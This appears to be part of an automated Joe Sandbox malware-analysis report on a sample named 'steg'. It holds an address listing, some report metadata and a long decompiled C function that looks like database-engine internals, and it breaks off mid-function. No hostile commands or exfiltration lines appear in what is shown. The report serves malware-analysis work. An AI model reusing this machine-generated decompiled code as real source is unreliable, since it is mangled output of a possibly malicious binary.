                                                                                                                    0x00faccaf
                                                                                                                    0x00facccb
                                                                                                                    0x00faccd1
                                                                                                                    0x00faccd4
                                                                                                                    0x00000000
                                                                                                                    0x00faccd4
                                                                                                                    0x00facc97
                                                                                                                    0x00facd0d
                                                                                                                    0x00facd0d
                                                                                                                    0x00000000
                                                                                                                    0x00fac401
                                                                                                                    0x00fac405
                                                                                                                    0x00fac40a
                                                                                                                    0x00fac40d
                                                                                                                    0x00fac419
                                                                                                                    0x00fac41c
                                                                                                                    0x00fac420
                                                                                                                    0x00fac423
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fac429
                                                                                                                    0x00fac42c
                                                                                                                    0x00fac430
                                                                                                                    0x00fac432
                                                                                                                    0x00fac435
                                                                                                                    0x00fac437
                                                                                                                    0x00fac43e
                                                                                                                    0x00fac43f
                                                                                                                    0x00fac444
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fac444
                                                                                                                    0x00fac446
                                                                                                                    0x00fac449
                                                                                                                    0x00fac449
                                                                                                                    0x00fac44e
                                                                                                                    0x00fac563
                                                                                                                    0x00fac566
                                                                                                                    0x00fac566
                                                                                                                    0x00fac56b
                                                                                                                    0x00fac56e
                                                                                                                    0x00000000
                                                                                                                    0x00fac570
                                                                                                                    0x00fac570
                                                                                                                    0x00000000
                                                                                                                    0x00fac570
                                                                                                                    0x00fac454
                                                                                                                    0x00fac458
                                                                                                                    0x00fac57a
                                                                                                                    0x00fac58d
                                                                                                                    0x00fac45e
                                                                                                                    0x00fac465
                                                                                                                    0x00fac4a3
                                                                                                                    0x00fac4aa
                                                                                                                    0x00fac4ef
                                                                                                                    0x00fac4f1
                                                                                                                    0x00fac4f4
                                                                                                                    0x00fac4f4
                                                                                                                    0x00fac4ac
                                                                                                                    0x00fac4ac
                                                                                                                    0x00fac4b3
                                                                                                                    0x00fac4b6
                                                                                                                    0x00fac4bc
                                                                                                                    0x00fac4bc
                                                                                                                    0x00fac4c5
                                                                                                                    0x00fac4ca
                                                                                                                    0x00fac4cf
                                                                                                                    0x00fac4d4
                                                                                                                    0x00fac4e2
                                                                                                                    0x00fac4d6
                                                                                                                    0x00fac4d7
                                                                                                                    0x00fac4dd
                                                                                                                    0x00000000
                                                                                                                    0x00fac4dd
                                                                                                                    0x00fac4d4
                                                                                                                    0x00fac4f9
                                                                                                                    0x00000000
                                                                                                                    0x00fac4fb
                                                                                                                    0x00fac4fb
                                                                                                                    0x00000000
                                                                                                                    0x00fac4fb
                                                                                                                    0x00fac475
                                                                                                                    0x00fac475
                                                                                                                    0x00fac47d
                                                                                                                    0x00000000
                                                                                                                    0x00fac47f
                                                                                                                    0x00fac481
                                                                                                                    0x00fac487
                                                                                                                    0x00fac48d
                                                                                                                    0x00fac499
                                                                                                                    0x00fac49b
                                                                                                                    0x00fac49b
                                                                                                                    0x00fac4ff
                                                                                                                    0x00fac501
                                                                                                                    0x00000000
                                                                                                                    0x00fac503
                                                                                                                    0x00fac503
                                                                                                                    0x00fac513
                                                                                                                    0x00fac518
                                                                                                                    0x00fac51b
                                                                                                                    0x00fac524
                                                                                                                    0x00fac52f
                                                                                                                    0x00fac536
                                                                                                                    0x00fac539
                                                                                                                    0x00fac53e
                                                                                                                    0x00fac541
                                                                                                                    0x00fac544
                                                                                                                    0x00fac546
                                                                                                                    0x00fac54c
                                                                                                                    0x00fac54f
                                                                                                                    0x00fac557
                                                                                                                    0x00fac55b
                                                                                                                    0x00fac55e
                                                                                                                    0x00000000
                                                                                                                    0x00fac55e
                                                                                                                    0x00fac501
                                                                                                                    0x00fac47d
                                                                                                                    0x00fac465
                                                                                                                    0x00fac458
                                                                                                                    0x00000000
                                                                                                                    0x00fac44e
                                                                                                                    0x00fac41c
                                                                                                                    0x00000000
                                                                                                                    0x00fac40d
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: s
                                                                                                                    • API String ID: 2102423945-453955339
                                                                                                                    • Opcode ID: 27555b70ef7d20551ef3324653022f24c3df66ef29c555851bf8a9a37d1e24ec
                                                                                                                    • Instruction ID: c75aedaa630e1f0276430db0c1eafcce0554eb075d96d471433f0ebd7ed22e4f
                                                                                                                    • Opcode Fuzzy Hash: 27555b70ef7d20551ef3324653022f24c3df66ef29c555851bf8a9a37d1e24ec
                                                                                                                    • Instruction Fuzzy Hash: 2323ACB0900244DFDB28EF58C880BAABBB5FF05314F1981ADEC06AB356D735E855DB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FC7627 Relevance: 6.5, Strings: 4, Instructions: 1515COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00FC7627(signed int __ecx, intOrPtr* _a4, intOrPtr _a8, signed char _a12, signed char _a16, signed char _a20, signed int _a24) {
				intOrPtr _v8;
				signed char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed char _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				signed char _v56;
				signed char _v60;
				signed int _v64;
				signed char _v65;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				signed char _v100;
				signed char _v104;
				signed int _v108;
				signed int _v112;
				signed char _v116;
				signed char _v120;
				signed char _v124;
				signed char _v128;
				signed char _v132;
				char _v136;
				signed char _v140;
				char _v172;
				signed char _t818;
				signed int _t844;
				void* _t846;
				void* _t851;
				void* _t852;
				signed char _t854;
				signed char _t856;
				signed char _t857;
				signed char _t858;
				intOrPtr _t859;
				signed char _t862;
				signed int _t863;
				signed char _t864;
				intOrPtr _t865;
				intOrPtr _t868;
				signed char _t869;
				signed char _t870;
				signed char _t878;
				intOrPtr _t879;
				signed char _t880;
				signed int _t882;
				signed int _t885;
				signed char _t891;
				signed int _t892;
				intOrPtr _t893;
				signed char _t894;
				intOrPtr _t895;
				signed char _t897;
				intOrPtr _t898;
				signed char _t913;
				void* _t916;
				intOrPtr _t922;
				signed int _t924;
				intOrPtr _t925;
				signed char _t926;
				intOrPtr _t932;
				signed char _t934;
				intOrPtr _t935;
				signed int _t942;
				signed char _t950;
				signed int _t956;
				signed int _t959;
				signed int _t960;
				signed char _t961;
				signed char _t962;
				signed char _t964;
				signed int _t966;
				intOrPtr _t967;
				signed int _t968;
				intOrPtr _t969;
				intOrPtr _t970;
				signed char _t971;
				void* _t973;
				signed char _t975;
				void* _t976;
				signed char _t978;
				signed char _t980;
				signed char _t981;
				void* _t985;
				signed int _t987;
				intOrPtr _t988;
				signed char _t989;
				signed int _t991;
				void* _t995;
				signed char _t998;
				signed char _t1002;
				signed int _t1004;
				signed char _t1010;
				signed char _t1016;
				signed char _t1022;
				intOrPtr _t1028;
				signed char _t1035;
				signed char _t1037;
				signed char _t1041;
				void* _t1046;
				signed int _t1050;
				void* _t1059;
				signed int _t1065;
				void* _t1069;
				void* _t1071;
				signed char _t1072;
				intOrPtr* _t1074;
				intOrPtr _t1075;
				short _t1076;
				signed char _t1077;
				signed int _t1078;
				intOrPtr* _t1079;
				signed int _t1081;
				signed char _t1082;
				signed char _t1085;
				signed char _t1086;
				signed int _t1087;
				signed int _t1088;
				signed char _t1089;
				signed char _t1090;
				signed int _t1091;
				signed char _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1099;
				signed char _t1101;
				signed char _t1104;
				signed char _t1107;
				signed int _t1108;
				signed int _t1111;
				intOrPtr _t1115;
				signed char _t1117;
				signed char _t1118;
				signed int _t1119;
				intOrPtr _t1121;
				signed int _t1122;
				signed int _t1123;
				void* _t1125;
				void* _t1127;
				signed char _t1128;
				signed int _t1130;
				signed char _t1131;
				signed char _t1133;
				signed int _t1136;
				signed int _t1137;
				intOrPtr* _t1140;
				intOrPtr _t1146;
				intOrPtr _t1147;
				signed int _t1149;
				signed int _t1150;
				signed char _t1153;
				signed char _t1154;
				signed int _t1156;
				signed int _t1158;
				signed int _t1159;
				signed char _t1164;
				signed char _t1165;
				signed int _t1166;
				signed int _t1169;
				signed char _t1170;
				intOrPtr _t1171;
				signed int _t1172;
				signed char _t1173;
				signed int _t1174;
				signed char _t1176;
				intOrPtr _t1179;
				intOrPtr* _t1180;
				intOrPtr _t1181;
				intOrPtr _t1182;
				signed char _t1183;
				signed char _t1184;
				signed char _t1185;
				signed char _t1186;
				signed char _t1188;
				intOrPtr _t1189;
				signed int _t1190;
				signed int _t1193;
				signed int _t1194;
				signed int _t1197;
				char* _t1198;
				signed char _t1199;
				signed char _t1200;
				intOrPtr _t1201;
				signed char _t1202;
				intOrPtr _t1203;
				void* _t1204;
				void* _t1205;
				void* _t1208;
				void* _t1209;
				void* _t1212;
				void* _t1213;
				void* _t1214;
				void* _t1215;
				void* _t1216;
				void* _t1217;
				void* _t1218;
				void* _t1219;
				void* _t1220;
				void* _t1221;
				void* _t1222;
				void* _t1223;
				void* _t1225;
				intOrPtr _t1253;

				_t1074 = _a4;
				_t1182 =  *_t1074;
				_t1081 = __ecx | 0xffffffff;
				asm("xorps xmm0, xmm0");
				_v40 = 0;
				_v76 = _t1081;
				_v60 = 0;
				_v32 = 0;
				_v108 = 0;
				_v112 = 0;
				_v80 = _t1081;
				_v116 = 0;
				_v96 = 0;
				_v120 = 0;
				_v12 = 0;
				_v84 = 0;
				_v52 = _t1182;
				asm("movq [ebp-0x84], xmm0");
				asm("movq [ebp-0x7c], xmm0");
				if( *((intOrPtr*)(_t1074 + 0x40)) != 0 ||  *((intOrPtr*)(_t1182 + 0x1e)) != 0) {
					L257:
					_t1075 = _v52;
					E00FD13B7(_t1075, _a8);
					E00FC3017(_t1075, _a12);
					_t1176 = _a16;
					_t1209 = _t1208 + 0x10;
					if(_t1176 != 0) {
						E00FC3017(_t1075,  *_t1176);
						E00FD13B7(_t1075,  *((intOrPtr*)(_t1176 + 8)));
						_t1183 =  *(_t1176 + 0xc);
						_t1212 = _t1209 + 0x10;
						if(_t1183 != 0) {
							E00FC12E7(_t1075, _t1183);
							_t1212 = _t1212 + 8;
							if(( *(_t1183 + 2) & 0x00008000) == 0) {
								if(_t1075 == 0 || _t1183 <  *((intOrPtr*)(_t1075 + 0xe8)) || _t1183 >=  *((intOrPtr*)(_t1075 + 0xec))) {
									E00F97247(_t1183);
									_t1212 = _t1212 + 4;
								} else {
									 *_t1183 =  *(_t1075 + 0xe4);
									 *((intOrPtr*)(_t1075 + 0xdc)) =  *((intOrPtr*)(_t1075 + 0xdc)) - 1;
									 *(_t1075 + 0xe4) = _t1183;
								}
							}
						}
						E00FC3017(_t1075,  *((intOrPtr*)(_t1176 + 0x10)));
						_t1184 =  *(_t1176 + 0x14);
						_t1213 = _t1212 + 8;
						if(_t1184 != 0) {
							E00FC12E7(_t1075, _t1184);
							_t1213 = _t1213 + 8;
							if(( *(_t1184 + 2) & 0x00008000) == 0) {
								if(_t1075 == 0 || _t1184 <  *((intOrPtr*)(_t1075 + 0xe8)) || _t1184 >=  *((intOrPtr*)(_t1075 + 0xec))) {
									E00F97247(_t1184);
									_t1213 = _t1213 + 4;
								} else {
									 *_t1184 =  *(_t1075 + 0xe4);
									 *((intOrPtr*)(_t1075 + 0xdc)) =  *((intOrPtr*)(_t1075 + 0xdc)) - 1;
									 *(_t1075 + 0xe4) = _t1184;
								}
							}
						}
						E00FC3017(_t1075,  *((intOrPtr*)(_t1176 + 0x18)));
						E00FD0DB7(_t1075,  *((intOrPtr*)(_t1176 + 0x1c)));
						_t1185 =  *(_t1176 + 0x28);
						_t1209 = _t1213 + 0x10;
						if(_t1185 != 0) {
							E00FC12E7(_t1075, _t1185);
							_t1209 = _t1209 + 8;
							if(( *(_t1185 + 2) & 0x00008000) == 0) {
								if(_t1075 == 0 || _t1185 <  *((intOrPtr*)(_t1075 + 0xe8)) || _t1185 >=  *((intOrPtr*)(_t1075 + 0xec))) {
									E00F97247(_t1185);
									_t1209 = _t1209 + 4;
								} else {
									 *_t1185 =  *(_t1075 + 0xe4);
									 *((intOrPtr*)(_t1075 + 0xdc)) =  *((intOrPtr*)(_t1075 + 0xdc)) - 1;
									 *(_t1075 + 0xe4) = _t1185;
								}
							}
						}
						_t1186 =  *(_t1176 + 0x2c);
						if(_t1186 != 0) {
							E00FC12E7(_t1075, _t1186);
							_t1209 = _t1209 + 8;
							if(( *(_t1186 + 2) & 0x00008000) == 0) {
								if(_t1075 == 0 || _t1186 <  *((intOrPtr*)(_t1075 + 0xe8)) || _t1186 >=  *((intOrPtr*)(_t1075 + 0xec))) {
									E00F97247(_t1186);
									_t1209 = _t1209 + 4;
								} else {
									 *_t1186 =  *(_t1075 + 0xe4);
									 *((intOrPtr*)(_t1075 + 0xdc)) =  *((intOrPtr*)(_t1075 + 0xdc)) - 1;
									 *(_t1075 + 0xe4) = _t1186;
								}
							}
						}
						if(_t1075 == 0 || _t1176 <  *((intOrPtr*)(_t1075 + 0xe8)) || _t1176 >=  *((intOrPtr*)(_t1075 + 0xec))) {
							E00F97247(_t1176);
							_t1209 = _t1209 + 4;
						} else {
							 *_t1176 =  *(_t1075 + 0xe4);
							 *((intOrPtr*)(_t1075 + 0xdc)) =  *((intOrPtr*)(_t1075 + 0xdc)) - 1;
							 *(_t1075 + 0xe4) = _t1176;
						}
					}
					E00FC6AC7(_t1075, _a20);
					_t1082 = _v84;
					if(_t1075 == 0 || _t1082 == 0 || _t1082 <  *((intOrPtr*)(_t1075 + 0xe8)) || _t1082 >=  *((intOrPtr*)(_t1075 + 0xec))) {
						return E00F97247(_t1082);
					} else {
						_t818 =  *(_t1075 + 0xe4);
						 *_t1082 = _t818;
						 *((intOrPtr*)(_t1075 + 0xdc)) =  *((intOrPtr*)(_t1075 + 0xdc)) - 1;
						 *(_t1075 + 0xe4) = _t1082;
						return _t818;
					}
				} else {
					_t842 = _a8;
					if( *((intOrPtr*)(_a8 + 0xc)) == 0) {
						goto L257;
					}
					_t1179 = E00FD1917(_t1081, _t1074, _t842);
					_t1208 = _t1208 + 8;
					_v8 = _t1179;
					if(_t1179 == 0) {
						goto L257;
					}
					_t844 = E00FCF827(_t1182,  *((intOrPtr*)(_t1179 + 0x48)));
					_v16 = _t844;
					_t1084 = _t844 + _t844;
					_t846 = E00FB7797(_t1074, 0x12,  *((intOrPtr*)(_t1179 + 4)), 0,  *((intOrPtr*)( *((intOrPtr*)(_t1182 + 8)) + (_t844 + _t844) * 8)));
					_t1208 = _t1208 + 0x1c;
					if(_t846 != 0) {
						goto L257;
					}
					_v88 = E00FD2947(_t1084, _t1074, _t1179, 0x6b, 0,  &_v72);
					_v100 = 0 |  *((intOrPtr*)(_t1179 + 0x1c)) != 0x00000000;
					_t851 = E00FC8AE7(_t1074, _t1179, _v72);
					_t1208 = _t1208 + 0x20;
					_t1232 = _t851;
					if(_t851 != 0) {
						goto L257;
					}
					_t852 = E00FDF1A7(_t1232, _t1074, _t1179);
					_t1208 = _t1208 + 8;
					if(_t852 != 0) {
						goto L257;
					}
					_t1180 = E00FC6757(_t1074);
					_t1208 = _t1208 + 4;
					if(_t1180 == 0) {
						goto L257;
					} else {
						if( *((char*)(_t1074 + 0x13)) == 0) {
							 *((char*)(_t1180 + 0x6d)) = 1;
						}
						if(_a16 != 0 || _v88 != 0) {
							_t854 = 1;
						} else {
							_t854 = 0;
						}
						E00FB8827(_t1074, _t854, _v16);
						_t1214 = _t1208 + 0xc;
						if(_v88 != 0) {
							_t1072 =  *(_t1074 + 0x44);
							_v80 = _t1072;
							 *(_t1074 + 0x44) = _t1072 + 1;
						}
						if(_a20 != 0) {
							L18:
							_t856 = E00F9DC07(_t1074, _v16, _v8);
							_t1215 = _t1214 + 0xc;
							_v104 = _t856;
							if(_a16 == 0) {
								_t1085 = _a12;
								asm("xorps xmm0, xmm0");
								asm("movq [ebp-0xa8], xmm0");
								asm("movq [ebp-0xa0], xmm0");
								asm("movq [ebp-0x98], xmm0");
								asm("movq [ebp-0x90], xmm0");
								_v140 = 0;
								_v172 = _t1074;
								_v32 = 0xffffffff;
								__eflags = _t1085;
								if(_t1085 == 0) {
									_t857 = 0;
									__eflags = 0;
								} else {
									_t857 =  *_t1085;
								}
								_v56 = _t857;
								_v20 = 0;
								__eflags = _t857;
								if(_t857 <= 0) {
									L36:
									_t1146 = _v8;
									if(( *(_t1146 + 0x22) & 0x00000010) == 0) {
										L42:
										__eflags = 0;
										L43:
										_t1086 = _v56;
										if(_a20 != 0) {
											_t1188 = _a20;
											_t858 =  *(_t1188 + 4);
											__eflags = _t1086 - _t858;
											if(_t1086 == _t858) {
												_t1087 = 0;
												__eflags = _t858;
												if(_t858 <= 0) {
													L53:
													_t1088 = 0;
													_v16 = 0;
													__eflags =  *(_t1188 + 4);
													if( *(_t1188 + 4) <= 0) {
														L66:
														__eflags = _v88;
														if(_v88 != 0) {
															E00FD65D7(_t1180, 0x75, _v80, 0,  *((intOrPtr*)(_t1146 + 0xc)));
															_t1215 = _t1215 + 0x14;
														}
														_t1182 = _v52;
														__eflags =  *(_t1182 + 0xc) & 0x00000080;
														if(( *(_t1182 + 0xc) & 0x00000080) != 0) {
															_t187 = _t1074 + 0x48;
															 *_t187 =  *(_t1074 + 0x48) + 1;
															__eflags =  *_t187;
															_v120 =  *(_t1074 + 0x48);
															E00FD6567(_t1180, 0x30, 0,  *(_t1074 + 0x48));
															_t1215 = _t1215 + 0x10;
														}
														__eflags = _v100;
														if(_v100 != 0) {
															L76:
															__eflags = _v60;
															if(_v60 == 0) {
																__eflags = _a16;
																if(_a16 != 0) {
																	_v112 = E00FD64F7(_t1180, 0x3c, _v132);
																	_t1004 = E00FD64F7(_t1180, 0xb, _v12);
																	_t1215 = _t1215 + 0x18;
																	_v108 = _t1004;
																}
															} else {
																_v108 = E00FD64F7(_t1180, 0x7a, _v32);
																_t1215 = _t1215 + 0xc;
																_v112 =  *(_t1180 + 0xc);
															}
															 *(_t1074 + 0x48) =  *(_t1074 + 0x48) + 1;
															_t1089 =  *(_t1074 + 0x48);
															_t1147 = _v8;
															_t859 = _t1089 + 1;
															_v44 = _t859;
															_v24 = _t859;
															_t862 =  *((intOrPtr*)(_t1147 + 0xc)) + 1 + _t1089;
															 *(_t1074 + 0x48) = _t862;
															__eflags =  *(_t1147 + 0x22) & 0x00000010;
															if(( *(_t1147 + 0x22) & 0x00000010) != 0) {
																_t1002 = _t862 + 1;
																__eflags = _t1002;
																_v24 = _t1089 + 2;
																 *(_t1074 + 0x48) = _t1002;
															}
															_t863 = E00FDD1A7(_t1180);
															_t1208 = _t1215 + 4;
															__eflags = _v72 & 0x00000001;
															_v48 = _t863;
															if((_v72 & 0x00000001) == 0) {
																L152:
																__eflags = _v100;
																if(_v100 != 0) {
																	L214:
																	__eflags =  *(_t1182 + 0xc) & 0x00000080;
																	if(( *(_t1182 + 0xc) & 0x00000080) == 0) {
																		L219:
																		_t864 = _v88;
																		__eflags = _t864;
																		if(_t864 == 0) {
																			L221:
																			_t1090 =  *(_t1180 + 0x20);
																			__eflags = _t1090;
																			if(_t1090 != 0) {
																				_t1094 = _t1090 - 4 + _v48 * 4;
																				__eflags = _t1094;
																				 *_t1094 =  *(_t1180 + 0xc);
																			}
																			__eflags = _v60;
																			if(_v60 == 0) {
																				__eflags = _a16;
																				if(_a16 != 0) {
																					E00FD6567(_t1180, 0x60, 0, _v112);
																					_t1149 =  *(_t1180 + 0xc);
																					_t882 = _v108;
																					_t1208 = _t1208 + 0x10;
																					__eflags = _t1149 - _t882;
																					if(_t1149 > _t882) {
																						 *( *((intOrPtr*)(_t1180 + 0x14)) + 8 + (_t882 + _t882 * 4) * 4) = _t1149;
																					}
																				}
																			} else {
																				E00FD6567(_t1180, 0x6a, _v32, _v112);
																				_t1150 =  *(_t1180 + 0xc);
																				_t885 = _v108;
																				_t1216 = _t1208 + 0x10;
																				__eflags = _t1150 - _t885;
																				if(_t1150 > _t885) {
																					 *( *((intOrPtr*)(_t1180 + 0x14)) + 8 + (_t885 + _t885 * 4) * 4) = _t1150;
																				}
																				E00FD64F7(_t1180, 0x21, _v32);
																				_t1208 = _t1216 + 0xc;
																			}
																			_t865 = _v8;
																			__eflags =  *(_t865 + 0x22) & 0x00000010;
																			if(( *(_t865 + 0x22) & 0x00000010) != 0) {
																				L240:
																				__eflags =  *((char*)(_t1074 + 0x13));
																				if( *((char*)(_t1074 + 0x13)) == 0) {
																					__eflags =  *(_t1074 + 0x1e8);
																					if( *(_t1074 + 0x1e8) == 0) {
																						_push(_t1074);
																						E00FB7E87();
																						_t1208 = _t1208 + 4;
																					}
																				}
																				__eflags =  *(_t1182 + 0xc) & 0x00000080;
																				if(( *(_t1182 + 0xc) & 0x00000080) == 0) {
																					goto L257;
																				} else {
																					__eflags =  *((char*)(_t1074 + 0x13));
																					if( *((char*)(_t1074 + 0x13)) != 0) {
																						goto L257;
																					}
																					__eflags =  *(_t1074 + 0x1e8);
																					if( *(_t1074 + 0x1e8) != 0) {
																						goto L257;
																					}
																					E00FD6567(_t1180, 0x5a, _v120, 1);
																					E00FDEFB7(_t1180, 1);
																					_t868 =  *_t1180;
																					_t1208 = _t1208 + 0x18;
																					__eflags =  *((char*)(_t868 + 0x1e));
																					if( *((char*)(_t868 + 0x1e)) != 0) {
																						goto L257;
																					}
																					_t1181 =  *((intOrPtr*)(_t1180 + 0x28));
																					_t869 =  *(_t1181 + 0x10);
																					__eflags = _t869;
																					if(_t869 == 0) {
																						_t870 = 0x3b9aca00;
																					} else {
																						_t870 =  *(_t869 + 0x48);
																					}
																					_t1189 = 0;
																					__eflags = _t870;
																					if(_t870 < 0) {
																						L253:
																						_t1076 = 0x202;
																						_push(_t1181);
																						__eflags = 0 - 0x433f60;
																						if(0 != 0x433f60) {
																							E00FDDBA7();
																							_t1076 = 0xa02;
																						} else {
																							E00FDDBA7();
																							 *((intOrPtr*)(_t1181 + 0x24)) = 0x477c50;
																						}
																						 *(_t1181 + 0x20) = 0;
																						 *((intOrPtr*)(_t1181 + 0x14)) = 0x477c50;
																						_t1208 = _t1208 + 4;
																						 *((intOrPtr*)(_t1181 + 0x18)) = _t1189;
																						 *((short*)(_t1181 + 0x1c)) = _t1076;
																						 *((short*)(_t1181 + 0x1e)) = 0x103;
																						goto L257;
																					} else {
																						while(1) {
																							__eflags =  *((char*)(_t1189 + 0x477c50));
																							if( *((char*)(_t1189 + 0x477c50)) == 0) {
																								goto L253;
																							}
																							_t1189 = _t1189 + 1;
																							__eflags = _t1189 - _t870;
																							if(_t1189 <= _t870) {
																								continue;
																							}
																							goto L253;
																						}
																						goto L253;
																					}
																				}
																			} else {
																				__eflags = _v100;
																				if(_v100 != 0) {
																					goto L240;
																				}
																				E00FD64F7(_t1180, 0x21, _v40);
																				_t1208 = _t1208 + 0xc;
																				_t1077 =  *(_v8 + 0x14);
																				__eflags = _t1077;
																				if(_t1077 == 0) {
																					L239:
																					_t1074 = _a4;
																					goto L240;
																				}
																				_t878 = _v40 + 1;
																				__eflags = _t878;
																				_v72 = _t878;
																				do {
																					_t1190 =  *(_t1180 + 0xc);
																					__eflags =  *((intOrPtr*)(_t1180 + 0x10)) - _t1190;
																					if( *((intOrPtr*)(_t1180 + 0x10)) > _t1190) {
																						L236:
																						_t879 =  *((intOrPtr*)(_t1180 + 0x14));
																						_t704 = _t1180 + 0xc;
																						 *_t704 =  *(_t1180 + 0xc) + 1;
																						__eflags =  *_t704;
																						_t1091 = _t1190 + _t1190 * 4;
																						 *((short*)(_t879 + _t1091 * 4)) = 0x21;
																						 *((char*)(_t879 + 3 + _t1091 * 4)) = 0;
																						 *(_t879 + 4 + _t1091 * 4) = _v72;
																						 *(_t879 + 8 + _t1091 * 4) = 0;
																						 *(_t879 + 0xc + _t1091 * 4) = 0;
																						 *(_t879 + 0x10 + _t1091 * 4) = 0;
																						 *((char*)(_t1180 + 0x6e)) = 0;
																						goto L237;
																					}
																					_t880 = E00FA96F7(_t1180);
																					_t1208 = _t1208 + 4;
																					__eflags = _t880;
																					if(_t880 != 0) {
																						goto L237;
																					}
																					goto L236;
																					L237:
																					_t1077 =  *(_t1077 + 0x20);
																					_v72 = _v72 + 1;
																					__eflags = _t1077;
																				} while (_t1077 != 0);
																				_t1182 = _v52;
																				goto L239;
																			}
																		}
																		_t891 = E00FBCB07(_t1074, _t864, 0x6b, 0, 2, _v8, _v80, 0xffffffff, _a24, _v48, 0, 0);
																		_t1208 = _t1208 + 0x30;
																		__eflags = _t891;
																		if(_t891 != 0) {
																			goto L257;
																		}
																		goto L221;
																	}
																	_t892 =  *(_t1180 + 0xc);
																	_v28 = _t892;
																	__eflags =  *((intOrPtr*)(_t1180 + 0x10)) - _t892;
																	if( *((intOrPtr*)(_t1180 + 0x10)) > _t892) {
																		L218:
																		_t635 = _t1180 + 0xc;
																		 *_t635 =  *(_t1180 + 0xc) + 1;
																		__eflags =  *_t635;
																		_t1095 = _t892 + _t892 * 4;
																		_t893 =  *((intOrPtr*)(_t1180 + 0x14));
																		 *((short*)(_t893 + _t1095 * 4)) = 0x2a;
																		 *((char*)(_t893 + 3 + _t1095 * 4)) = 0;
																		 *(_t893 + 4 + _t1095 * 4) = _v120;
																		 *(_t893 + 8 + _t1095 * 4) = 1;
																		 *(_t893 + 0xc + _t1095 * 4) = 0;
																		 *(_t893 + 0x10 + _t1095 * 4) = 0;
																		 *((char*)(_t1180 + 0x6e)) = 0;
																		goto L219;
																	}
																	_t894 = E00FA96F7(_t1180);
																	_t1208 = _t1208 + 4;
																	__eflags = _t894;
																	if(_t894 != 0) {
																		goto L219;
																	}
																	_t892 = _v28;
																	goto L218;
																}
																_t895 = _v8;
																__eflags =  *(_t895 + 0x22) & 0x00000010;
																if(( *(_t895 + 0x22) & 0x00000010) != 0) {
																	E00FD6567(_t1180, 0x77, 0, _v44);
																	_t895 = _v8;
																	_t1208 = _t1208 + 0x10;
																}
																_t1096 = _v76;
																__eflags = _t1096;
																if(_t1096 < 0) {
																	__eflags =  *(_t895 + 0x22) & 0x00000010;
																	if(( *(_t895 + 0x22) & 0x00000010) == 0) {
																		E00FD65D7(_t1180, 0x1a, _v40, _v24, _v104);
																		_t1098 = _v24;
																		_t1217 = _t1208 + 0x14;
																		goto L174;
																	}
																	E00FD6567(_t1180, 0x77, 0, _v24);
																	_t1098 = _v24;
																	_t1217 = _t1208 + 0x10;
																	goto L175;
																} else {
																	__eflags = _v60;
																	_push(_v24);
																	if(_v60 == 0) {
																		__eflags = _a16;
																		if(_a16 == 0) {
																			_push( *((intOrPtr*)( *((intOrPtr*)(_a12 + 0xc)) + (_t1096 + _t1096 * 4) * 4)));
																			_push(_t1074);
																			E00FC1357();
																			_t932 =  *_t1180;
																			_t1217 = _t1208 + 0xc;
																			_t1111 =  *(_t1180 + 0xc) - 1;
																			__eflags =  *((char*)(_t932 + 0x1e));
																			if( *((char*)(_t932 + 0x1e)) == 0) {
																				_t934 =  *((intOrPtr*)(_t1180 + 0x14)) + (_t1111 + _t1111 * 4) * 4;
																				__eflags = _t934;
																				if(_t934 == 0) {
																					L158:
																					_t935 = _v8;
																					__eflags =  *(_t935 + 0x22) & 0x00000010;
																					if(( *(_t935 + 0x22) & 0x00000010) != 0) {
																						__eflags =  *(_t1180 + 0xc) + 2;
																						E00FD6567(_t1180, 0x47, _v24,  *(_t1180 + 0xc) + 2);
																						_t1218 = _t1217 + 0x10;
																					} else {
																						_v28 = E00FD64F7(_t1180, 0x48, _v24);
																						E00FD65D7(_t1180, 0x1a, _v40, _v24, _v104);
																						_t1156 =  *(_t1180 + 0xc);
																						_t942 = _v28;
																						_t1218 = _t1217 + 0x20;
																						__eflags = _t1156 - _t942;
																						if(_t1156 > _t942) {
																							 *( *((intOrPtr*)(_t1180 + 0x14)) + 8 + (_t942 + _t942 * 4) * 4) = _t1156;
																						}
																					}
																					E00FD64F7(_t1180, 0x26, _v24);
																					_t1098 = _v24;
																					_t1217 = _t1218 + 0xc;
																					L175:
																					_t897 = _v104;
																					__eflags = _t897;
																					if(_t897 > 0) {
																						E00FD6567( *(_t1074 + 0xc), 0x2d, _t897, _t1098);
																						_t1217 = _t1217 + 0x10;
																					}
																					_t898 = _v8;
																					_t1099 = 0;
																					_v20 = 0;
																					_v64 = 0;
																					__eflags =  *(_t898 + 0xc);
																					if( *(_t898 + 0xc) <= 0) {
																						L195:
																						__eflags =  *(_t898 + 0x22) & 0x00000010;
																						if(( *(_t898 + 0x22) & 0x00000010) == 0) {
																							__eflags = _v76;
																							E00FC46C7(_t1074, _v8, _v40, _v44, _v84, 0 | _v76 > 0x00000000, 0, _a24, _v48,  &_v28);
																							_v28 = _v72 & 0x00000002;
																							_t906 =  !=  ? _v80 : 0xffffffff;
																							E00FBD3B7(_t1074, _v8, _v40, _v44, _v84, 0,  !=  ? _v80 : 0xffffffff, _v116, 0 | _v28 == 0x00000000);
																							_t1208 = _t1217 + 0x4c;
																						} else {
																							E00FDF947(_t1074, _t898);
																							E00FD6647(_t1180, 0x7d, 1,  *((intOrPtr*)(_v8 + 0xc)) + 2, _v44,  *((intOrPtr*)(_v8 + 0x38)), 0xfffffff6);
